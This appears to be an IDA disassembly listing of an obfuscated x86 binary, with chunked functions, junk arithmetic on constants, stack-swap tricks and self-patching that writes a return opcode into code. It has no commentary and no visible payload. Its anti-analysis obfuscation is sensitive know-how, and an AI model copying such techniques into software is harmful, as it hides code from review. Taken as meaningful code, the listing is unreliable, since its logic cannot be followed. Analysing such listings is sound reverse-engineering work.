; FUNCTION CHUNK AT 0043D23F SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0043DB57 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004436A4 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00447C55 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00448815 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044AD3F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DBA8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044EF31 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044F34B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004510A7 SIZE 0000000B BYTES

		xchg	edx, [esp+0]
		pop	edx
		js	loc_43D24C
		cmp	dword ptr [ebp-4], 4
		jnz	loc_45BF35
		jmp	loc_44DBA8
sub_45447D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F67B

loc_454496:				; CODE XREF: sub_43F67B:loc_4460CBj
		add	ecx, 9E5E9BEh
		xchg	ecx, [esp+4+var_4]
		jmp	sub_4476EE
; END OF FUNCTION CHUNK	FOR sub_43F67B
; ---------------------------------------------------------------------------
		jnb	loc_458870
		pop	eax
		jmp	sub_4407FF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_126. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4544B1:				; CODE XREF: y2kk37jd:0043E608j
		push	offset sub_43E2EA
		jmp	nullsub_289
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B489

loc_4544BB:				; CODE XREF: sub_44B489-8D49j
		sbb	eax, 5D18F67Ch

loc_4544C1:				; CODE XREF: sub_44B489:loc_456478j
		push	0CA2259E7h
		pop	eax
		or	eax, 0D425F34Ch
		jmp	loc_45AEC8
; END OF FUNCTION CHUNK	FOR sub_44B489
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_4544D2:				; CODE XREF: sub_43F75D+FC8Bj
		add	esi, 0E1069146h

loc_4544D8:				; CODE XREF: sub_45AAAA:loc_453372j
		mov	ebx, [edi]
		and	ebx, edx

loc_4544DC:				; CODE XREF: sub_43F75D:loc_44F3DCj
		sub	eax, 0E56AAD8Dh
		add	eax, 0CC6EFE5Eh
		xchg	eax, [esp+0]
		jmp	loc_43FC92
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------
		shl	esi, 1Fh
		test	eax, 0E79A647Fh
		jmp	loc_45B7A4
; ---------------------------------------------------------------------------
		ror	eax, 4
		jnp	loc_450A5E
		jmp	sub_45598E
; ---------------------------------------------------------------------------
		mov	ecx, 0C3B5FFC4h
		jmp	loc_451E9A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EE8A

loc_454516:				; CODE XREF: sub_43EE8A:loc_43C0CFj
		mov	eax, edx
		xchg	eax, [esp+0]
		push	esi
		push	0D2E8E961h
		pop	esi
		xor	esi, ds:4000ECh
		and	esi, 0B71B22E7h
		sub	esi, 4820639Ch
		jmp	loc_445508
; END OF FUNCTION CHUNK	FOR sub_43EE8A

; =============== S U B	R O U T	I N E =======================================



sub_454539	proc near		; CODE XREF: y2kk37jd:loc_445D8Fj
					; sub_44CBA4p ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043DBED SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004406F7 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00441DC1 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004446B8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00444E19 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004467B3 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00448B55 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A69A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044B6CC SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044BFF0 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044D9A2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DA44 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004504B7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004513B3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045636E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004566D9 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004571DC SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004584F9 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0045953B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A163 SIZE 00000012 BYTES

		pop	edx
		jns	loc_444E19
		mov	eax, [esp+4+var_4]
		push	edx
		call	sub_43C326
		jmp	loc_4504B7
sub_454539	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_45454E	proc near		; DATA XREF: sub_445D0C+11E04o

; FUNCTION CHUNK AT 0044BAC3 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 004585D9 SIZE 00000005 BYTES

		push	0D1427FAEh
		pop	esi
		rol	esi, 19h
		add	esi, 0E5E3C6ECh
		jmp	loc_44BAC3
sub_45454E	endp

; ---------------------------------------------------------------------------

loc_454562:				; CODE XREF: y2kk37jd:004491F5j
		jbe	loc_4410A0

; =============== S U B	R O U T	I N E =======================================



sub_454568	proc near		; CODE XREF: sub_452B75+79F7p
		xchg	esi, [esp+0]
		pop	esi
sub_454568	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_445787

loc_45456C:				; CODE XREF: sub_445787:loc_44E339j
		mov	eax, [ebp+8]
		or	dword ptr [eax-8], 8
		jmp	loc_45485A
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452C0C

loc_454578:				; CODE XREF: sub_452C0C+7j
					; sub_452C0C+14j
		jb	loc_43C44D
		jmp	loc_45629D
; END OF FUNCTION CHUNK	FOR sub_452C0C
; ---------------------------------------------------------------------------

locret_454583:				; CODE XREF: y2kk37jd:loc_44376Aj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_454584:				; CODE XREF: sub_456809-E40Cj
		jmp	loc_43C319
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447166

loc_454589:				; CODE XREF: sub_447166+Bj
		jmp	nullsub_483
; END OF FUNCTION CHUNK	FOR sub_447166
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451634

loc_45458E:				; CODE XREF: sub_451634-15CADj
		jmp	loc_454284
; END OF FUNCTION CHUNK	FOR sub_451634
; ---------------------------------------------------------------------------
		ror	ebp, 16h
		jmp	sub_45709E
; ---------------------------------------------------------------------------
		or	edi, 0D32D1541h

loc_4545A1:				; CODE XREF: y2kk37jd:loc_43C3E0j
		jmp	loc_459F95
; ---------------------------------------------------------------------------

loc_4545A6:				; CODE XREF: y2kk37jd:00458BB8j
		cmp	ebx, 880A7236h
		jmp	loc_45BD83
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45643D

loc_4545B1:				; CODE XREF: sub_45643D+6j
		pop	ebx
		lea	eax, sub_446AC6
		mov	byte ptr [eax],	0C3h
		jmp	sub_446AC6
; END OF FUNCTION CHUNK	FOR sub_45643D

; =============== S U B	R O U T	I N E =======================================



sub_4545C0	proc near		; CODE XREF: sub_41A618+3Bp
					; y2kk37jd:0045A1C3j
					; DATA XREF: ...

; FUNCTION CHUNK AT 0043C6A4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DE9B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00452C07 SIZE 00000005 BYTES

		push	ebx
		jmp	loc_43C6A4
sub_4545C0	endp

; ---------------------------------------------------------------------------
		jz	loc_4453A5
		jmp	loc_43F09F
; ---------------------------------------------------------------------------

locret_4545D1:				; CODE XREF: y2kk37jd:loc_44D035j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454C24

loc_4545D2:				; CODE XREF: sub_454C24+13j
		jmp	loc_45373B
; END OF FUNCTION CHUNK	FOR sub_454C24
; ---------------------------------------------------------------------------
		test	ebp, 51877B95h
		jmp	loc_4563B6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_4545E2:				; CODE XREF: sub_44AC89+35AAj
		test	ebp, 1E19F2F3h
		jmp	loc_445DA6
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
		push	0A199B1CAh
		jmp	loc_445B33

; =============== S U B	R O U T	I N E =======================================



sub_4545F7	proc near		; CODE XREF: y2kk37jd:0044385Fj
					; sub_43F770:loc_44C323p

; FUNCTION CHUNK AT 00448805 SIZE 00000010 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	34C21A26h
		add	edx, edi
		jmp	loc_448805
sub_4545F7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_454607:				; CODE XREF: sub_43ED19-D94j
		pop	esi

loc_454608:				; CODE XREF: sub_43ED19:loc_43E1C2j
		call	sub_45405E
		push	8C18BBAFh
		add	edx, 2685A439h
		jmp	loc_44E76D
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------

loc_45461D:				; CODE XREF: y2kk37jd:loc_4489F6j
					; DATA XREF: y2kk37jd:00454D28o
		shl	eax, cl
		mov	edx, [ebp-20h]
		shr	edx, 3
		push	9BC09039h
		pop	ecx
		sub	ecx, 88B2AFAAh
		xor	ecx, 88103CB4h
		jmp	loc_451EB5
; ---------------------------------------------------------------------------

loc_45463C:				; CODE XREF: y2kk37jd:0044F9C9j
		or	ecx, 6B807D29h
		xor	ecx, 2B45CA99h
		add	ecx, ebp
		add	ecx, 3F374A32h
		mov	ecx, [ecx]
		jmp	loc_4462C2
; ---------------------------------------------------------------------------

loc_454657:				; DATA XREF: sub_43BE53+12A43o
		call	sub_442C3E
		mov	ds:off_41E0D8, eax
		lea	eax, loc_44900D
		call	sub_44E95F
; START	OF FUNCTION CHUNK FOR sub_44AFF6

loc_45466D:				; CODE XREF: sub_44AFF6+1j
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		xchg	ebx, [esp+0]
		mov	ebp, ebx
		jmp	loc_4523E5
; END OF FUNCTION CHUNK	FOR sub_44AFF6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459789

loc_45467C:				; CODE XREF: sub_442376:loc_44F717j
					; sub_459789:loc_45BF04j
		jz	loc_43D933
		jmp	loc_44718C
; END OF FUNCTION CHUNK	FOR sub_459789
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_454687:				; CODE XREF: sub_445226:loc_457C58j
		jnz	loc_44E7FD
		jmp	loc_441586
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_454692	proc near		; CODE XREF: sub_44346B-122Bp
					; y2kk37jd:0045AF88j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00449773 SIZE 00000002 BYTES

		xchg	edi, [esp-4+arg_0]
		pop	edi
		xchg	ebx, [esp+0]
		mov	ebp, ebx
		jmp	loc_449773
sub_454692	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44572F

loc_4546A0:				; CODE XREF: sub_44572F+Cj
		mov	eax, 12h
		push	edi
		mov	edi, esi
		xchg	edi, [esp+34h+var_34]
		jmp	loc_44135A
; END OF FUNCTION CHUNK	FOR sub_44572F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D5A

loc_4546B0:				; CODE XREF: sub_457D5A:loc_4533E2j
		jge	loc_4548D2
; END OF FUNCTION CHUNK	FOR sub_457D5A
; START	OF FUNCTION CHUNK FOR sub_452C88

loc_4546B6:				; CODE XREF: sub_452C88+10j
		jmp	loc_441B0A
; END OF FUNCTION CHUNK	FOR sub_452C88
; ---------------------------------------------------------------------------
		cmp	eax, esi
		jmp	loc_440253
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442A84

loc_4546C2:				; CODE XREF: sub_442A84+13BBBj
		cmp	edi, esi
		jmp	loc_4598DE
; END OF FUNCTION CHUNK	FOR sub_442A84
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4546C9:				; CODE XREF: sub_445226:loc_4549B3j
					; y2kk37jd:004549CEj
		add	edx, 7D67EFA7h
		xchg	edx, [esp+0Ch+var_C]
		push	offset loc_452FC8
		jmp	nullsub_362
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_4546DC:				; CODE XREF: sub_43ED86+339Dj
		mov	edi, 75FA141Fh

loc_4546E1:				; CODE XREF: sub_43ED86:loc_45079Cj
		mov	eax, 33F214AFh
		call	sub_442C3E
		rol	eax, 3
		jmp	loc_453BE1
; END OF FUNCTION CHUNK	FOR sub_43ED86
; ---------------------------------------------------------------------------
		xchg	eax, [esp]
		mov	edx, eax
		pop	eax
		mov	eax, [esp]

loc_4546FC:				; CODE XREF: y2kk37jd:loc_4552FCj
		push	esi
		push	edx
		pop	esi
		jmp	loc_4456C8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B491

loc_454704:				; CODE XREF: sub_45B491:loc_43F87Bj
		jnz	loc_44C211
		jmp	loc_457FA2
; END OF FUNCTION CHUNK	FOR sub_45B491
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444E83

loc_45470F:				; CODE XREF: sub_444E83:loc_445915j
		pushf
		jmp	loc_43EDE3
; END OF FUNCTION CHUNK	FOR sub_444E83

; =============== S U B	R O U T	I N E =======================================



sub_454715	proc near		; CODE XREF: y2kk37jd:00447E88j
					; DATA XREF: sub_44107E:loc_447E7Eo
		mov	eax, [ebp-0Ch]
		push	eax
		call	sub_44DB32
sub_454715	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44107E

loc_45471E:				; CODE XREF: y2kk37jd:0043EB2Bj
					; y2kk37jd:0043FA05j ...
		jo	loc_4537A6
		call	sub_4577FE

loc_454729:				; CODE XREF: y2kk37jd:loc_43F09Fj
		test	al, al
		jz	loc_445F41
		jmp	loc_444500
; END OF FUNCTION CHUNK	FOR sub_44107E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_454736:				; CODE XREF: sub_4507BF-54FAj
		rol	ecx, 18h
		add	ecx, 5EFA1FCCh
		popf
		xchg	ecx, [esp+0]
		jmp	sub_4502C2
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
		push	0

loc_45474A:				; CODE XREF: y2kk37jd:loc_459712j
		call	sub_445DF5
; START	OF FUNCTION CHUNK FOR sub_44B924

loc_45474F:				; CODE XREF: sub_44B924:loc_43B640j
		jmp	nullsub_146
; END OF FUNCTION CHUNK	FOR sub_44B924
; ---------------------------------------------------------------------------

loc_454754:				; CODE XREF: y2kk37jd:0044337Aj
					; y2kk37jd:004464C9j ...
		mov	eax, 6F7h
		push	offset loc_45535B
		jmp	loc_453DB9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455DDE

loc_454763:				; CODE XREF: sub_455DDE+11j
		jz	loc_45B9DA
		jmp	loc_44561E
; END OF FUNCTION CHUNK	FOR sub_455DDE
; ---------------------------------------------------------------------------
		jg	loc_44ADF3
		mov	ebx, [edi]
		jmp	sub_4517E6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_45477B:				; CODE XREF: sub_43F2F2+1C676j
		xchg	edx, [esp+0]
		jmp	loc_44AEE5
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------
		call	sub_45405E
		mov	edx, 9E849D81h

loc_45478D:				; CODE XREF: y2kk37jd:loc_43B735j
		push	ebx
		push	0EB90A3C2h
		pop	ebx
		xor	ebx, 0CF3DF61Eh
		jmp	loc_452312
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_45479F:				; CODE XREF: sub_4514DE-13EC5j
		push	71CE263Fh
		mov	ecx, ebx
		xchg	edi, ebx
		push	0EBDFE683h
		jmp	loc_43C597
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453315

loc_4547B2:				; CODE XREF: sub_453315+7j
		xchg	esi, [esp+0]
		mov	esp, ebp
		push	offset loc_4451D5
		jmp	nullsub_147
; END OF FUNCTION CHUNK	FOR sub_453315
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_4547C1:				; CODE XREF: sub_4429DD+8631j
		lea	eax, [ebp-125h]
		push	eax
		call	sub_43BA66
		mov	[ebp-4], eax
		cmp	dword ptr [ebp-4], 0
		jnz	loc_44D4CA
		call	sub_451C21

loc_4547DF:				; CODE XREF: y2kk37jd:00440F07j
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_4429DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A961

loc_4547E4:				; CODE XREF: sub_45A961:loc_454151j
		mov	eax, 3CFDF720h
		push	esi
		push	99687D92h
		pop	esi
		jmp	loc_44640F
; END OF FUNCTION CHUNK	FOR sub_45A961
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_4547F5:				; CODE XREF: sub_456809:loc_452C9Ej
		test	eax, eax
		jz	loc_44A735
		jmp	loc_4408AF
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446C40

loc_454802:				; CODE XREF: sub_446C40:loc_44B109j
					; sub_446C40+4C19j
		mov	eax, [esp+0]
		call	sub_44AD49
; END OF FUNCTION CHUNK	FOR sub_446C40
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_45480A:				; CODE XREF: sub_4411C3+56BCj
					; sub_446C40+2j
		xchg	eax, [esp+0Ch+var_C]
		call	sub_448512
; END OF FUNCTION CHUNK	FOR sub_4411C3
; START	OF FUNCTION CHUNK FOR sub_45801A

loc_454812:				; CODE XREF: sub_45801A+12j
		jmp	nullsub_234
; END OF FUNCTION CHUNK	FOR sub_45801A

; =============== S U B	R O U T	I N E =======================================



sub_454817	proc near		; DATA XREF: sub_445226+A4B1o
		add	esi, 9312C788h
		add	esi, edx
		call	sub_44753E
sub_454817	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_457042

loc_454824:				; CODE XREF: sub_457042:loc_457ECCj
		mov	eax, ecx
		pop	ecx
		add	eax, 154347D9h
		rol	eax, 1Eh
		sub	eax, 0AAECE461h
		xor	eax, 91166B61h
		push	eax
		jmp	loc_44AB44
; END OF FUNCTION CHUNK	FOR sub_457042
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_454842:				; CODE XREF: sub_4507BF-E074j
		jz	loc_44691C
		jmp	loc_446BB0
; END OF FUNCTION CHUNK	FOR sub_4507BF

; =============== S U B	R O U T	I N E =======================================



sub_45484D	proc near		; CODE XREF: y2kk37jd:004419B6j
					; sub_452C0C+887Ap

; FUNCTION CHUNK AT 0043C839 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044C3C0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004511D9 SIZE 0000001B BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		shl	eax, 3
		mov	edx, [ebp+8]
		or	[edx-8], eax

loc_45485A:				; CODE XREF: sub_445787+EDECj
					; sub_452B75:loc_45A566j ...
		jns	loc_43C839
		cmp	dword ptr [ebp-14h], 4
		jmp	loc_4511D9
sub_45484D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_454869:				; CODE XREF: sub_44B814:loc_45A772j
		jz	loc_44B9AC
; END OF FUNCTION CHUNK	FOR sub_44B814
; START	OF FUNCTION CHUNK FOR sub_43FE51

loc_45486F:				; CODE XREF: sub_43FE51+1A742j
		jmp	loc_43B89E
; END OF FUNCTION CHUNK	FOR sub_43FE51
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_454874:				; CODE XREF: sub_43F911+FB6Ej
		jmp	sub_440CD1
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
		jbe	loc_45BD4F
		jmp	loc_44B9A8
; ---------------------------------------------------------------------------

locret_454884:				; CODE XREF: y2kk37jd:00443D0Bj
		retn
; ---------------------------------------------------------------------------

loc_454885:				; DATA XREF: sub_442EB4:loc_45A2E9o
		mov	eax, [eax]
		push	eax
		call	sub_448C11
		cmp	dword ptr [ebp-8], 0
		jmp	loc_44EF8F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_498. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		jmp	loc_444482
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444E83

loc_45489C:				; CODE XREF: sub_444E83:loc_450426j
		sub	edi, 0E58E5A68h
		or	edi, 0B3F18F62h
		add	edi, 8049957h
		add	edi, ebp
		add	edi, 3C01C73Ah
; END OF FUNCTION CHUNK	FOR sub_444E83
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4548B6:				; CODE XREF: sub_445226+6Ej
		mov	[edi], eax
		pop	edi
		jmp	loc_448262
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A46

loc_4548BE:				; CODE XREF: sub_457A46-1893Bj
		mov	ecx, 0FD70C992h
		xor	ebp, ecx
		or	edi, ecx

loc_4548C7:				; CODE XREF: sub_43D8B6+9j
					; sub_457A46:loc_440773j ...
		xchg	ebp, [esp+0]
		mov	ecx, ebp
		pop	ebp
		jmp	loc_4496A0
; END OF FUNCTION CHUNK	FOR sub_457A46
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D5A

loc_4548D2:				; CODE XREF: y2kk37jd:00440261j
					; sub_457D5A:loc_4546B0j
		sub	eax, 80F32B95h
		add	eax, 0AF668F4h
		popf
		call	sub_443688
		cmp	ds:dword_450BC8, 0
		jmp	loc_457DDF
; END OF FUNCTION CHUNK	FOR sub_457D5A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_36. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FAC

loc_4548F1:				; CODE XREF: sub_442FAC+166E4j
		jmp	sub_4526B7
; END OF FUNCTION CHUNK	FOR sub_442FAC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457524

loc_4548F6:				; CODE XREF: sub_457524+118j
		jmp	loc_444300
; END OF FUNCTION CHUNK	FOR sub_457524

; =============== S U B	R O U T	I N E =======================================



sub_4548FB	proc near		; CODE XREF: y2kk37jd:loc_44CDAEj
					; sub_44C2AE+A0F9p

; FUNCTION CHUNK AT 0043D9A5 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	0
		push	0
		call	sub_43C0A5
		push	eax
		jmp	loc_43D9A5
sub_4548FB	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_294. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_45490F:				; CODE XREF: sub_43F911+126A6j
		jmp	loc_44628F
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_454914:				; CODE XREF: sub_4458DD:loc_457DAEj
		jno	loc_448C6D
		jnz	sub_4415FF
		jmp	loc_456C15
; END OF FUNCTION CHUNK	FOR sub_4458DD

; =============== S U B	R O U T	I N E =======================================



sub_454925	proc near		; DATA XREF: sub_44753E:loc_43BC20o
		movzx	eax, word ptr [ebp-6]
		mov	[ebp-1Ch], eax
sub_454925	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43F346

loc_45492C:				; CODE XREF: sub_440337:loc_43D652j
					; sub_43F346:loc_446AA0j
		mov	eax, [ebp-18h]
		add	eax, 107111F7h
		add	eax, 0EF8EEE29h
		mov	eax, [eax]
		jmp	loc_440E5D
; END OF FUNCTION CHUNK	FOR sub_43F346

; =============== S U B	R O U T	I N E =======================================



sub_454942	proc near		; CODE XREF: y2kk37jd:0043CB32j
					; sub_445083:loc_449E0Cp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004428BB SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	eax, [esp-4+arg_0]
		jmp	loc_4428BB
sub_454942	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_45494E	proc near		; CODE XREF: sub_459789-121F8p
					; y2kk37jd:0044AD22j
		xchg	ecx, [esp+0]
		pop	ecx
		add	edi, 0A913458Fh
		add	edi, ebp
		push	offset loc_45A542
		jmp	nullsub_152
sub_45494E	endp

; ---------------------------------------------------------------------------
		shl	edx, 12h
		mov	[ebp+0], edi
		jmp	sub_44E39C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_45496F:				; CODE XREF: sub_43F75D-2B51j
		add	eax, ebp
		add	eax, 8ECB9D8Eh
		mov	eax, [eax]
		push	eax
		jmp	loc_44A4A3
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------
		mov	ebp, [ecx]
		jmp	sub_444825
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_129. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451843

loc_454987:				; CODE XREF: sub_451843+Cj
		jmp	loc_456773
; END OF FUNCTION CHUNK	FOR sub_451843
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44753E

loc_45498C:				; CODE XREF: sub_44753E-A965j
		jmp	loc_44DB11
; END OF FUNCTION CHUNK	FOR sub_44753E
; ---------------------------------------------------------------------------
		mov	edx, 0F2B89A19h
		call	sub_440CD1
		push	eax
		push	0BB30B6F4h

loc_4549A1:				; CODE XREF: y2kk37jd:0043DECEj
		pop	eax
		xor	eax, 0E6910182h
		and	eax, 655C2DA5h
		jmp	loc_44C60A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4549B3:				; CODE XREF: sub_445226:loc_458B65j
		jl	loc_4546C9

loc_4549B9:				; CODE XREF: y2kk37jd:0045A55Bj
		jmp	loc_43D7BB
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4477A2

loc_4549BE:				; CODE XREF: sub_4477A2+12911j
		jmp	loc_43D1E7
; END OF FUNCTION CHUNK	FOR sub_4477A2
; ---------------------------------------------------------------------------
		jnb	loc_459CCC
		xchg	esi, [edx]
		pop	esi
		sbb	eax, ebx
		jmp	loc_4546C9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_4549D3:				; CODE XREF: sub_44113A+16B09j
		push	9026D3C8h
		pop	eax
		or	eax, 43DB9C37h
		add	eax, 0F54F9345h
		jmp	loc_45587C
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------

loc_4549EA:				; DATA XREF: sub_44B589-7430o
		add	eax, [esp]
		adc	edx, [esp+4]
		add	esp, 8
		movzx	eax, word ptr [eax]
		shl	eax, 2
		push	7BB4832Eh
		jmp	loc_4557CD
; ---------------------------------------------------------------------------

loc_454A04:				; CODE XREF: y2kk37jd:004401A9j
		xor	esi, 0BC00DF86h
		cmp	esi, 15CCA160h
		jmp	loc_4596BE
; ---------------------------------------------------------------------------

loc_454A15:				; CODE XREF: y2kk37jd:004536C5j
		jbe	loc_44F09B
		js	loc_451B56
		add	ebp, ebx
		jmp	loc_4489F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_454A28:				; CODE XREF: sub_43F911-3054j
		pop	edx
		and	edx, 349BF1B2h
		jnz	loc_44FC17
		mov	[ebx], ebp
		and	edi, ebp
		jmp	loc_44E6AE
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_454A3E:				; CODE XREF: sub_445226:loc_4454C8j
		mov	al, [eax]
		jno	loc_452014
		sub	al, 99h
		mov	edx, [ebp-4]
		jmp	loc_45842B
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_454A50:				; CODE XREF: sub_4514DE:loc_44E82Bj
		ror	ecx, 6

loc_454A53:				; CODE XREF: y2kk37jd:loc_44B97Bj
		test	ebp, eax
		jmp	loc_453039
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------
		mov	ds:off_41E0D0, eax
		lea	eax, sub_446AC6
		mov	byte ptr [eax],	0C3h
		jmp	loc_44B8AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450203

loc_454A6E:				; CODE XREF: sub_450203+5j
		call	sub_455302

